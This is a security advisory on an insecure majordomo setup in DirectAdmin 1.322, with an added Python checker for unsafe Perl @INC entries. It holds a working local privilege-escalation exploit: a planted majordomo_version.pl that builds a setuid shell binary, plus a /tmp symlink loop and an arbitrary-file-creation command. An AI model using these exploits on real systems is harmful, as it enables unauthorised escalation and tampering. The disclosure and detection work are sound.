DirectAdmin 1.322 - insecure majordomo setup allows for privilege escalation


Note: this issue was already covered in the majordomo documentation. The issue here is that DirectAdmin used an insecure default setup of this third-party software.



DESCRIPTION


Due to an insecure default setup of the majordomo software, local users could escalate privileges to user:group majordomo:daemon.

UPDATE: 06/02/2010 - playing with this again for a few minutes reveals this was in fact trivially rootable through DirectAdmin, and in multiple ways.



IMPACT


Local users could escalate privileges to majordomo.daemon. Running "/etc/virtual/majordomo/wrapper config-test" makes the wrapper look for a file called "majordomo_version.pl" in the paths listed in @INC. The file is not found in any of those paths, and the very last entry in @INC is "." (the current directory), so a local user can create a file called "majordomo_version.pl" in the directory from which they run "/etc/virtual/majordomo/wrapper config-test", and the wrapper will attempt to execute that file. Since the wrapper runs as user:group majordomo:daemon, we must first give world-writable permissions to our own home directory (or you can probably just use /tmp).


Here is example output of running the command mentioned above:

[user@host ~]$ /etc/virtual/majordomo/wrapper config-test
------------------------------------------------------------
---------------- Config-test for Majordomo ----------------
------------------------------------------------------------

[ ... ]

Good: 'require'd /etc/virtual/majordomo/majordomo.cf okay.
Good: found ctime.pl okay.
Can't locate majordomo_version.pl in @INC (@INC contains: [ ... ]
.) at /etc/virtual/majordomo/config-test line 129


Note the "." at the very end of the "@INC contains" section.

[user@host ~]$ cat > majordomo_version.pl << 'EOF'
#!/usr/bin/perl

open my $shell_fh, '>', 'foo.c' or die $!;
print $shell_fh 'int main() { setreuid(102,102); setregid(2,2); system("/bin/bash"); }' . "\n";
close $shell_fh;

system("gcc foo.c -o foo");
system("chmod 6755 foo");
EOF
[user@host ~]$ chmod 755 ~/majordomo_version.pl
[user@host ~]$ chmod 777 ~
[user@host ~]$ /etc/virtual/majordomo/wrapper config-test
[user@host ~]$ ./foo
[majordomo@host ~]$ id
uid=102(majordomo) gid=2(daemon) groups=503(user)
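
As an added example (not part of the original advisory or of majordomo), the following Python script parses a Perl "Can't locate ... in @INC" message like the config-test output above and flags search-path entries that are relative or writable by group or others. The sample @INC paths are constructed, since the advisory elides the real ones, and the function names are hypothetical.

```python
import os
import re
import stat

# Matches Perl's "Can't locate X in @INC (@INC contains: a b c) at ..." message,
# including the line wrap seen in the config-test output.
INC_RE = re.compile(r"Can't locate (\S+) in @INC \(@INC contains:(.*?)\) at ", re.S)

def parse_inc(output):
    """Return (missing_file, [@INC entries]) from Perl error text, or None."""
    m = INC_RE.search(output)
    if not m:
        return None
    # Perl joins entries with spaces, so paths containing spaces are not handled.
    return m.group(1), m.group(2).split()

def audit_inc(entries):
    """Return [(entry, reason)] for entries a privileged script should not search."""
    findings = []
    for entry in entries:
        if not os.path.isabs(entry):
            findings.append((entry, "relative path, resolved against the caller's cwd"))
            continue
        try:
            mode = os.stat(entry).st_mode
        except OSError:
            continue  # entry does not exist on this host; not assessed
        if stat.S_ISDIR(mode) and mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((entry, "directory writable by group or others"))
    return findings

# Constructed sample: the advisory elides the real @INC entries with "[ ... ]".
SAMPLE = """Good: found ctime.pl okay.
Can't locate majordomo_version.pl in @INC (@INC contains: /etc/virtual/majordomo /usr/lib/perl5/site_perl
.) at /etc/virtual/majordomo/config-test line 129
"""

if __name__ == "__main__":
    missing, inc = parse_inc(SAMPLE)
    for entry, reason in audit_inc(inc):
        print(f"{missing}: unsafe @INC entry {entry!r}: {reason}")
```

Perl 5.26 and later no longer put "." in the default @INC, but a script or configuration can still add it, so the check applies there too.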


Two other issues were also reported, but they won't be fully discussed here, since the fix was simply a proper setup of the software. Examples can be found below.

[user@host ~]$ grep -n /tmp/log majordomo.pl
327:$log_file = "/tmp/log.$$";


[user@host ~]$ cd /tmp
[user@host /tmp]$ for x in `seq 1000 30000` ; do ln -s /etc/virtual/majordomo/foo log.$x ; done
[user@host /tmp]$ /etc/virtual/majordomo/wrapper digest
mj_digest: ABORT
[user@host /tmp]$ ls /etc/virtual/majordomo/foo
/etc/virtual/majordomo/foo



[user@host ~]$ chmod 777 ~
[user@host ~]$ /etc/virtual/majordomo/wrapper archive2.pl -f /home/user/test -a foo
[user@host ~]$ ls -l test
-rw-rw-r--  1 majordomo daemon    1 Sep  7 01:28 test